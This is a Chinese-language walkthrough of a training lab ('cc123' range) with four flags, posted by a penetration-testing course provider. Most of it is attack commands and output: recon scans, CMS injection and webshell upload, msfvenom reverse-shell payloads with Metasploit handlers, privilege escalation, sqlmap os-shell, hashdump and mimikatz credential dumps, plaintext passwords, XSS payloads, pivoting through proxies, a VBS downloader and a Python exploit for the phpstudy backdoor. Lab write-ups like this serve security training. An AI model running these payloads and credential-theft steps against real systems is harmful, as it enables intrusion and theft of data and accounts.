【原创】完整的渗透测试实例
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。


此pdf是技术文档 可能过程没那么详细 如对这方面有兴趣,可以参与暗月WEB安全培训 每一个细节我都会讲解清楚 培训网站 http://edu.moonsec.com
1.cc123靶场介绍
本靶场存在四个flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。
1.1.网络示意图

2.信息收集
2.1.主机发现
sudo netdiscover -i eth0 -r 192.168.0.0/24

2.2.masscan端口扫描
sudo masscan -p 1-65535 192.168.0.134 –rate=1000

2.3.nmap端口信息探测
nmap -sC -A 192.168.0.134 -p 80,53,49154,6588,3389,135,21,51464,999 -oA cc123-port

2.4.网站信息
http://192.168.0.134:6588/

http://192.168.0.134:999/

3.本地设置
3.1.绑定本地hosts
C:\Windows\System32\drivers\etc\hosts
192.168.0.134 www.cc123.com
3.2.设置本地网关

sudo vi /etc/resolv.conf

4.子域名搜集
4.1.wfuzz穷举子域名
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H “Host:FUZZ.cc123.com” –hw 53

5.子域名信息
dedecms | new.cc123.com |
KesionEDU | www.cc123.com |
net | ww2.cc123.com |
6.漏洞测试
6.1.dedecms安全检测
经测试发现会员系统开放 http://new.cc123.com/member/ 注册会员后,

dedecms的版本是20150618 存在注入。

密文 812df726be884ddcfc41 解密:admin7788

后台上传 http://new.cc123.com/dede/ 文件管理器上传一句话
中国蚁剑链接

7.提权服务器
在终端执行命令失败

上传ASPXSpy2014 http://new.cc123.com/a/ASPXSpy2014.aspx

7.1.metasploit windows 提权
生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=12345 -f exe >s.exe

metasplosit监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.109
lhost => 192.168.0.109
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit
7.2.扫描可写目录

7.3.得到meterpreter

7.4.检测能提权的漏洞
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1

[*] 192.168.0.134 - Collecting local exploits for x86/windows...
[*] 192.168.0.134 - 29 exploit checks are being tried...
[+] 192.168.0.134 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
7.5. ms16_075提权
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > set SESSION 1
msf5 exploit(windows/local/ms16_075_reflection_juicy) > exploit

8.得到flag
8.1.第一个flag

8.2.第二个flag

9.测试ww2.cc123.com安全
9.1.gobuster目录扫描
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x “aspx,html” -o ww2dir

http://ww2.cc123.com/admin 管理后台
http://ww2.cc123.com/editor 编辑器
经测试后台的密码是 cc123
9.2.SQLMAP测试注入
后台某个页面编抓包
GET /admin/aboutadd.aspx?id=7&pid=6 HTTP/1.1
Host: ww2.cc123.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://ww2.cc123.com/admin/aboutlist.aspx?pid=6
Cookie: CheckCode=266V; ASP.NET_SessionId=2bij0yxlearbaymq5yspvzc3
Upgrade-Insecure-Requests: 1
测试注入
sqlmap -r cc123 –dbms mssql -v 1 –batch

列出库
sqlmap -r cc123 –dbms mssql -v 1 –dbs

获取mssql shell
sqlmap -r cc123 –dbms mssql -v 1 –os-shell

IP信息和用户权限

9.3.SQLSERVER服务器信息整理
hostname 获取服务器名 WIN-JJU7KU45PN7
网卡信息
Windows IP 配置
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::c016:f9b9:6daa:7d73
IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
内网ip 可能是站库分离
9.4.第三个flag
type C:\Users\Administrator\root.txt.txt

9.5..net代码审计
c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\bin>dir

下载文件
download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin

9.5.1.反编译dll
IL Spy 导入你要反编译的dll

9.5.2.验证码可重用漏洞
protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
{
if (!(base.Request.Cookies["CheckCode"].Value == this.safecode.Text.Trim().ToUpper()))
{
base.Response.Write("<script>alert('验证码输入错误!');javascript:history.back(-1);</script>");
return;
}
string sql = string.Concat(new string[]
{
"select*from admin where username='",
this.username.Text.Trim(),
"' and password='",
StringClass.Encrypt(this.password.Text.Trim(), "yx139222"),
"'"
});
DataSet tableData = DBClass.GetTableData(sql, "admin");
if (tableData != null && tableData.Tables["admin"].Rows.Count > 0)
{
this.Session["users"] = this.username.Text.Trim();
base.Response.Redirect("index.aspx");
return;
}
base.Response.Write("<script>alert('姓名或密码输入错误!');javascript:history.back(-1);</script>");
漏洞验证

9.5.3.后台SQL注入漏洞

验证漏洞

9.5.4.后台所有文件存在SQL注入

后台所有文件的值传递都是没有过滤,所以都存在注入

9.5.5.后台编辑器上传漏洞
网站采用kindeditor 编辑存在上传漏洞
POST /editor/asp.net/upload_json.ashx?dir=file HTTP/1.1
Host: ww2.cc123.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------94606993523768564143156227113
Content-Length: 388
Origin: http://ww2.cc123.com
Connection: close
Referer: http://ww2.cc123.com/admin/aboutadd.aspx?pid=1
Cookie: CheckCode=8XZ0; ASP.NET_SessionId=2bij0yxlearbaymq5yspvzc3
Upgrade-Insecure-Requests: 1
-----------------------------94606993523768564143156227113
Content-Disposition: form-data; name="localUrl"
C:\fakepath\2.html
-----------------------------94606993523768564143156227113
Content-Disposition: form-data; name="imgFile"; filename="2.html"
Content-Type: text/html
<script>alert(document.cookie)</script>
-----------------------------94606993523768564143156227113--
过程


访问即弹cookie
9.5.6.前台xss
<%@ page language="c#" runat="server" %>
<script language="c#" runat="server">
public string strStyle;
public string strtheurl;
public void Page_Load(Object src,EventArgs e)
{
NameValueCollection ServerVariables = Request.ServerVariables;
strStyle=Request.QueryString["style"];
strtheurl=ServerVariables["URL"].ToString();
strtheurl=strtheurl.Substring(0,strtheurl.IndexOf("mystat.aspx",0,strtheurl.Length));
strtheurl="http://"+ServerVariables["HTTP_HOST"].ToString()+strtheurl;
}
</script>
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
_dwrite("<script language=javascript src="+url+"stat.aspx?style="+style+"&referer="+escape(document.referrer)+"&screenwidth="+(screen.width)+"></script>");
function _dwrite(string) {document.write(string);}
直接输出存在xss漏洞
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
验证 http://ww2.cc123.com/mystat.aspx?style=%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E%3Cscript%3E

9.6.后台用户密文解密
sqlmap命令
获取grcms_data库的表
sqlmap -r cc123 –dbms mssql -v 1 -tables -D grcms_data
导出表的所有内容
sqlmap -r cc123 –dbms mssql -v 1 –dump -T admin -D grcms_data

获取不到值
查找web.config 连接数据库 查询内容
value=”server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..” />

admin AE5F6187F32825CA
cc123 B97C57DB005F954242450A255217DA9F
9.7.查找解密文件
反编译登录处的文件一般都可以找到加密的函数

加密函数 key 是 yx139222

解密函数

9.8.c#编写解密工具
打开vs2012 新建项目选择.net4.5

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace WindowsFormsApplication2
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
public static string Decrypt(string pToDecrypt, string sKey)
{
DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
byte[] array = new byte[pToDecrypt.Length / 2];
for (int i = 0; i < pToDecrypt.Length / 2; i++)
{
int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);
array[i] = (byte)num;
}
dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
MemoryStream memoryStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);
cryptoStream.Write(array, 0, array.Length);
cryptoStream.FlushFinalBlock();
new StringBuilder();
return Encoding.Default.GetString(memoryStream.ToArray());
}
private void button1_Click(object sender, EventArgs e)
{
string passwd = textBox1.Text.Trim();
string key = textBox2.Text.Trim();
textBox3.Text = Decrypt(passwd, key);
}
}
}
拖动几个控件 编译生成 运行


admin cc123
cc123 qweasd123
10.多重网段内网渗透
10.1.WEB服务器信息收集
10.1.1.网卡信息
ifconfig

存在两个IP
192.168.0.134
10.10.10.135
10.1.2.路由信息
meterpreter > run get_local_subnets

网段两个
10.10.10.0
192.168.0.0
10.1.3.哈希获取
meterpreter > run hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
10.1.4.使用mimikatz获取明文
load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg

WIN-KALKEMT3JMA Administrator !@#Qwe123. WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p WIN-KALKEMT3JMA ww2cc123 xwSggtdWvl42JGHivMX
10.1.5.添加路由进行内网渗透
meterpreter > run autoroute -s 10.10.10.0/24

10.1.6.启动socks代理
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run
10.1.7. 使用proxychains配置文件
配置修改配置文件 sudo vim /etc/proxychains.conf
socks4 127.0.0.1 2222

10.1.8.使用 proxychains调用nmap扫描

这种表示配置成功。之后就可以调用其他程序进行内网方面。
10.2.数据库服务器信息收集
10.2.1.网卡端口信息
os-shell 执行 netstat -ano 查看端口信息
协议 本地地址 外部地址 状态 PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1192
TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 1224
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 376
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 752
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:49162 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:49163 0.0.0.0:0 LISTENING 256
TCP 10.10.1.128:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.134:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.134:1433 10.10.10.135:56314 ESTABLISHED 1192
TCP 10.10.10.134:1433 10.10.10.135:56315 ESTABLISHED 1192
TCP 10.10.10.134:1433 10.10.10.135:56397 ESTABLISHED 1192
TCP 10.10.10.134:1433 10.10.10.135:56398 ESTABLISHED 1192
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1192
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 700
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 1192
TCP [::]:2383 [::]:0 LISTENING 1224
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 376
TCP [::]:49153 [::]:0 LISTENING 752
TCP [::]:49154 [::]:0 LISTENING 492
TCP [::]:49155 [::]:0 LISTENING 852
TCP [::]:49162 [::]:0 LISTENING 484
TCP [::]:49163 [::]:0 LISTENING 256
TCP [::1]:1434 [::]:0 LISTENING 1192
UDP 0.0.0.0:123 *:* 936
UDP 0.0.0.0:500 *:* 852
UDP 0.0.0.0:4500 *:* 852
UDP 0.0.0.0:5355 *:* 1020
UDP 10.10.1.128:137 *:* 4
UDP 10.10.1.128:138 *:* 4
UDP 10.10.10.134:137 *:* 4
网卡信息
ommand standard output:
---
Windows IP 配置
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::c016:f9b9:6daa:7d73
IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
---
10.2.2.生成正向连接载荷
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 10.10.10.134
set lport 13777
10.2.3.上传bind.exe到WEB服务器

10.2.4.在数据库服务器写入vbs
这个文件的作用是下载 注意空格 否则获取出错。
echo iLocal = LCase(WScript.Arguments(1)) >C:/l.vbs
echo iRemote = LCase(WScript.Arguments(0))>>C:/l.vbs
echo Set xPost = CreateObject("Microsoft.XMLHTTP")>>C:/l.vbs
echo xPost.Open "GET",iRemote,0>>C:/l.vbs
echo xPost.Send()>>C:/l.vbs
echo Set sGet = CreateObject("ADODB.Stream")>>C:/l.vbs
echo sGet.Mode = 3 >>C:/l.vbs
echo sGet.Type = 1 >>C:/l.vbs
echo sGet.Open()>>C:/l.vbs
echo sGet.Write(xPost.responseBody)>>C:/l.vbs
echo sGet.SaveToFile iLocal,2 >>C:/l.vbs

执行失败

10.2.5.mssql上传文件

10.2.6.执行文件并且获取session
使用正向连接监听
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 10.10.10.134
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > run

10.2.7.迁移进程

10.2.8.加载mimikatz获取明文

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-JJU7KU45PN7$
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;50405 NTLM
0;999 NTLM WORKGROUP WIN-JJU7KU45PN7$
0;917832 NTLM WIN-JJU7KU45PN7 Administrator !@#QWEasd123.
获取明文 Administrator !@#QWEasd123.
10.3.渗透目标服务器
10.3.1.添加路由
目标机子赛 10.10.1.0 段
run autoroute -s 10.10.1.0/24

10.3.2.探测端口


Host is up (1.1s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
10.3.3.phpstudy后门测试
访问80端口发现是 phpstudy

10.3.4.python编写phpstudy后门exp
#conding:utf-8
import requests
import re
import sys
import base64
shell = "system('"+(sys.argv[1])+"');"
shell1 = base64.b64encode(shell.encode('utf-8'))
#shell1 = "ZmlsZV9wdXRfY29udGVudHMlMjglMjdtb29uJTI3JTJDJTI3JTNDJTNGcGhwJTIwZXZhbCUyOCUyNF9QT1NUJTVCJTIybW9vbiUyMiU1RCUyOSUzQiUzRiUzRSUyNyUyOSUzQg=="
header={'accept-charset':shell1,'Accept-Encoding':'gzip,deflate'}
def exploit(url):
html=requests.get(url=url,headers=header).text
return html
print(exploit('http://10.10.1.129/'))
写入shell
proxychains3 python3 phpstudy.py “echo ^>c:\phpstudy\WWW\shell.php”
10.3.5.访问后门

10.3.6.SocksCap64设置本机代理
要在kali的 /etc/proxychains.conf


10.3.7.获取目标机子的session
将bind.exe上传到目标上执行
metasploist正向连接目标
sf5 exploit(multi/handler) > set rhost 10.10.1.129
rhost => 10.10.1.129
msf5 exploit(multi/handler) > show options
process, none)
LPORT 13777 yes The listen port
RHOST 10.10.1.129 no The target address

目标的机子权限已经获取了
10.3.8.最后一个flag

11.关注
微信公众号

我的个人微信

12完整版pdf下载
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/1745.html